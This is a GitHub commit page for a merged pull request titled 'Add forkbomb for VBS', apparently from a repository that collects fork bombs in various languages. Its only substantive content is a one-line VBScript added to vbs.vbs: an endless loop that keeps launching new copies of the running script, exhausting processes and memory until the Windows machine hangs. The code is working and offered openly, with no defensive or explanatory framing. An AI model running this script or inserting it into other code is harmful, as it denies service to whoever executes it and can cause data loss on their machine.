Skip to content

Commit

Permalink
Merge pull request #6 from Sven65/patch-3
Browse files Browse the repository at this point in the history
Add forkbomb for VBS
  • Loading branch information
iamtraction authored Oct 1, 2020
2 parents d2b6fab + 22f3f26 commit bc237e2
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions vbs.vbs
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
While True CreateObject("WScript.Shell").Exec("wscript.exe " & Wscript.ScriptName) Wend

0 comments on commit bc237e2

Please sign in to comment.